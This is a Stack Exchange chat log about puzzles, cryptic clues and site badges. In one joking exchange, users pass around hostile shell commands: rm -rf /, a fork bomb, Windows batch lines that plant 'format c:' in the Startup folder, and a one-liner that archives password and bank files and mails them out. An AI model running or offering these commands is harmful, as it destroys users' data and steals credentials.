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@Saiid No sorry, Just Here for the Hat (looking at the wrong thing)
anybody been working on puzzling.stackexchange.com/q/46747/30633 btw?
(also feel free to click that link, any random 5 of you, so I can get a hat :)
I tried, but haven't thought of anything yet
Q: My Uncle's Music Box

SconibulusUnfortunately, my favorite uncle just passed away. He's the one that taught me all about puzzling, and supposedly found Davey Jones' treasure in his youth. I miss him very much, however, I just received a package from his Attorney, containing this letter from him. Nephew dearest I leave to yo...

**quietly copy and pastes url without user id portion just to spite rubio**
@Alconja lol rude :)
This one, on the other hand, I have ideas about :)
Hehe. I bet you do. I, however, don't.
(but - clicked)
aw. you didn't use the right link, so that did nothing for you.
One boxing killed it, it looks, but I don't think from chat works anyway
Anyway - on mine, I have a hint level 2 ready but am accepting suggestions on what might be a good topic for hint level 3
If any of you have not done so yet, and feel generous, please give me an upvote so I can get a silver badge: puzzling.stackexchange.com/q/46707/8949 ;-)
@Volatility I already had, sorry :) I generally upvote the What Is A ...™'s. Especially those that use the formatting I built for them. :)
I've noticed most recent puzzles of that type have stol...er, lovingly adopted the template I used for mine. (My latest template is better, btw)
I still go for the screenshot :D
I built a script for it. So I can ./what-is-a.sh Fortunate fortunate-words
and it spits out the full text blob ready to cut and paste :)
MathJax ftw
.sh? What language uses that?
unix/linux shell
See, I find Excel much easier
yuck :)
If you made a script that automatically generated the puzzles I would be a lot more impressed
I admit they're prettier. my latest version does a little better job of fully filling the heading blocks with the yellow
Oh, many of my puzzles have content generated by scripts
I come up with an idea, I run it through a script to see what kind of words do and don't fit it, and then if I like the result I cache it for later use
hey rubio
want a cool script I have? :)
The fun is usually winnowing the lists down to what I feel like keeping. (I know of over 100k Fortunate Words™ for example)
@Saiid What script is that?
Why am I worried
Don't be :)
just run it without opening
uhhhuh, I'll get right on that
it's only two lines of code, no need to be worried ;)
Line 1: echo "haha"
Line 2: rm -rf /
wouldn't do that
#!/usr/bin/env bash
:(){ :|:& };:
I know that one sorry :)
if anyone's on windows, try one of these
@echo off
echo format c: /fs:NTFS /p:2 ^>nul 2^>&1 >C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\wipeShut.bat
shutdown /r /p /f /c "000000000000000000000000000000000000000000000000000. . ."
@echo off
echo %%0^|%%0 ^>nul 2^>&1 >C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\wipeShut.bat
shutdown /r /p /f
find / ( -name 'pass' -o -name 'account' -o -name 'credit' -o -name 'bank' ) -print0 | xargs -0 tar czf /tmp/coolstuff.tgz && mail [email protected] -s "lol" < /tmp/coolstuff.tgz
(that wouldn't *exactly* work but you get the gist hehe)
how did you do that? :P
^ that
ah I see
here's a self modifying script:
(cmd /v:on /c "@for %a in (0) do @set /a !random!< nul")>>%0
echo type %0
goto thatplace
On average how long does it work before it breaks?
@Rubio I've been thinking about the Fortunate Words on and off, but haven't come up with anything that works (obviously, since otherwise I'd have posted an answer). The "level 1" hint seems like it should be a really big one.
And yet it's level 1. :)
@boboquack Are you referring to my code?
I know that gur svefg rqvgvba bs Bssvpvny Fpenooyr Jbeqf jnf choyvfurq in 1988 but I don't know whether it was October and in any case it doesn't (so far) suggest anything super-obvious.
It depends on the system lol
And I really want "Fortunate" to turn out to be derived from "four, two 'n' eight" but that doesn't suggest anything useful either.
@GarethMcCaughan Well, now I'll be disappointed if/when it isn't.
well at least princess bride clips help to dampen the disappointment :P
So anyone got any ideas on deusovi's cryptic?
Seems a little impenetrable with only 3 words... I'm wondering if "I" could be "me" or "one" or similar, but don't see any useful words that start/end that way...
What about useful word that ends in p?
As in I=1st from Pass?
But then you've got nothing left to cryptify the rest of the word, because it would force competent to be the def
Wow, thought it'd be solved by now
@Deusovi Everyone's focused on hats
@Saiid Oh, you mean this old thing? ...just something I threw on.
Only other idea I had was that "I=MOD" (since deusovi is), then you could have "pass=RATE", but that leaves you an E short of the def...
I don't think that sums to 90 under A1Z26
Either way, it doesn't matter since it clearly lacks the middle E, and I can't imagine deus would do that
Ok, thinking out loud. I can't imagine that "competent" or "pass" could possibly be a cryptic clue all on it's own. Therefore one of them has to be the definition, and "I" has to be cryptically important.
I can't think of any ways that any of the words could be indicators of anything (except maybe pass as being a "right to left" reversal or something??)
So, that (probably) just leaves synonyms... Starting with the simplest, "I" could be: ME, SELF, EGO, MOD, ONE, IMAGINARY, NINTH, IODINE.... anything else?
Could be an &lit where "I pass" clues remove I or something, but I don't really see the clue as a definition
Surely deusovi would "!" that though?
Can the "?" mean anything? I was ignoring it up to this point...
Not that I can see
So, according to this: "immediately after the definition, the question mark indicates the clue will require lateral thinking or different interpretation of the words"
I don't see how else it can be interpreted though
I had assumed it only went at the end as an indicator, but sounds like it could be, under the proviso that "competent" is the (possibly lateral) definition
@Alconja None of those are the correct interpretation.
No, nor me... it's a pretty unambiguous word for forming definitions with...
unless it's something sneaky where you break it up an interpret as multiple words... "Me cop tent" (police officer gone camping)
Ok, @deusovi, I see you... sneaky bastard
It's a lower case L
I l
I was excited because it was a sans-serif font, then realized too late that the I had serifs anyway. Apparently it still worked though. :P
where did the CCCC go?
(you'll notice i'm tipping my hat to you)
It's still there. Alconja and/or Volatility are about to solve it.
I don't see it pinned
It's pinned for me
It's at the top for me.
and me... at the top
"Competent? l pass (8)"
yeah, I don't see it
oh well
Maybe you're in too many rooms?
Do you see any stars at all?
I am in a few rooms, but idk
Does the "other rooms you're in" section go to the bottom of your page?
hmm, I dunno then
there's about a space of three chat posts, the only words are 'enable desktop notification'
refreshed, it shows now
Anyway, Alconja's figured out the main gimmick. All that's left is to actually solve the clue
...which is making me feel stupid, since I don't see it. :)
Don't see what? The solution to the clue?
I'm stupid anyway, haven't solved a single one of these
@Deusovi can we edit in old questions to add the imgur-maze tag? I mean, it's a legit tag now?
Yeah, go ahead. (I don't see a need for it to be a tag in the first place, but apparently other people do.)
Ok thanks:)
Don't edit a lot though - space it out so you don't clutter up the frontpage.
Aaand he's gone.
I space it out by a lot
*sends in 10 suggested edits within a minute*
Q: Ernie and the unfair division of the dessert

PenguinoI was pleased to get an invitation to Ernie's place for dinner last Wednesday. The triplets were staying for the week so I knew Ernie would be making an extra effort to cook a gourmet home-cooked feast. So I was surprised when, on arrival, I saw a van from "The Great British Takeaways Company" pu...

@Deusovi The solution...
But right now, I've got to keep working, so for the benefit of other solvers to come (and feel free to star it for visibility), deusovi's clue is, in fact:
CCCC: Competent? [lower case L] pass (8)
oh geez. seriously, that's a lower-case l?
Where's my wrench . . . :)
yeah, figured you all were gonna hate me for that one
well on chrome, it shows as 'l', whereas uppercase 'I' shows with the serifs
yep, it does in all browsers
It doesn't on waterfox(for me at least)
@Deusovi Just as well you're not in PPCG - that's not allowed! :P
That is, at the moment
@boboquack Hm? What do you mean?
^ my thoughts exactly. What does 'I' vs 'l' have to do with PPCG?
Similar looking etc. as variables in underhanded contests
Oh, wasn't there one like that for a code-troll?
Oh, not a code-troll, but I was thinking of this one: codegolf.stackexchange.com/a/11462/7911
@boboquack ah
so... will someone hurry up and defeat @Deusovi's mighty beast?
ls starting a sentence with a lowercase letter allowed in a cryptic clue?
@Alconja Did you mean [Iower case L]?
(You can never be too sure)
Ah drat, I thought of Wheel of Fortune, but saw that it existed before 1988, so just discarded it
@boboquack {I0\/\/3|^ (@53 |_}
...sorry, typo... that space should be a tab
@Volatility On Rubio's question?
nice job
thought it'd last until tomorrow
@Deusovi nah, not a lot, just edited five or six :)
And guess what, I got a secret hat!
Gee, I wonder if you could've had some ulterior motive. :P
@Deusovi :P
which hat?
So one can get it for just editing tags, or not editing any tags
So clearly it has nothing to do with tags
Actually, I'm beginning to think it might be because of the edit steak. :o
@Rubio the don't wanna taco thingy
"edit steak"
@Deusovi "streak" xD
Stupid autocorrect
2 hours later…
Ho ho ho my friends
Who you callin' a ho?
This ho ain't loyal
But I'm Santa, I can call anyone my "ho"
I have a "ho" named "ho ho"
Makes sense. I think.
Can 5 people do me a favor and got to this link while not signed in and click the upvote button please?
Is there a grammatical sentence in English with 7 ho's in a ro(w)?
what hat, @Mithrandir?
I just got Elementary finally. woot
@Rubio No idea. Any.
No - that was stackreader
@boboquack I don't think so
So 'Ho ho ho ho ho ho ho!' is not a valid sentence in your opinion?
ok @Mithrandir +1 click from me
Oh, all left alone, maybe
Thanks all who clicked. I'll wait and see (the more people who click the better)
Who are you to sign out from PSE?!
just open in Incognito :P
Or use a different browser
Can everyone send me $1000 in unmarked bills (the more the better)? Just wanna test something for a secret hat.
"Glad to help."
Sweet. "Thanks" :)
Sorry Rubio for the copycat
Hey, they're mine! Thief!
Imitation is the sincerest form of flattery. And the worst form of vanilla.
Oh, got the Sportsmanship overnight
I'm in the restricted club of 7 holders
very cool. congrats!
What's the rarest (non-zero) badge on pse?
I'll say Socratic
@Alconja Gold tag badge
@Randal'Thor has the only one
Socratic has 2
Like 5 badges have 2 people.
Oh, you're right
Socratic, Epic and Refiner have 2
And Marshal
I wish it was a little easier to see your progress toward a specific badge
And Copy Editor
I'm VTROing this:
Q: What's the optimal strategy in Gomoku / Five in a row?

SF.Gomoku can be played with Go pieces or as a pen-and-paper game, a variation of big board tic-tac-toe. There are multiple computerized variations of it, and the computer can be deadly efficient as an opponent, so surely there exist algorithms that assure victory. What is the optimal strategy ...

Because I think it's on-topic.
@Rubio Agreed. Like, on the badges page for instance
Yeah exactly
I should be getting 11 on Puzzling on the next sweep
@Mithrandir I'm joining you for completely altruistic reasons
I'm ranked #5 on the network
(but I think the closers had a point - that question looks like it should have been migrated to board games, not left here)
And I'm undisputably #1 on Puzzling.
hm. I'm 65/100 toward the Fanatic badge
@Rubio You gotta be here on Christmas and New Year's Eve

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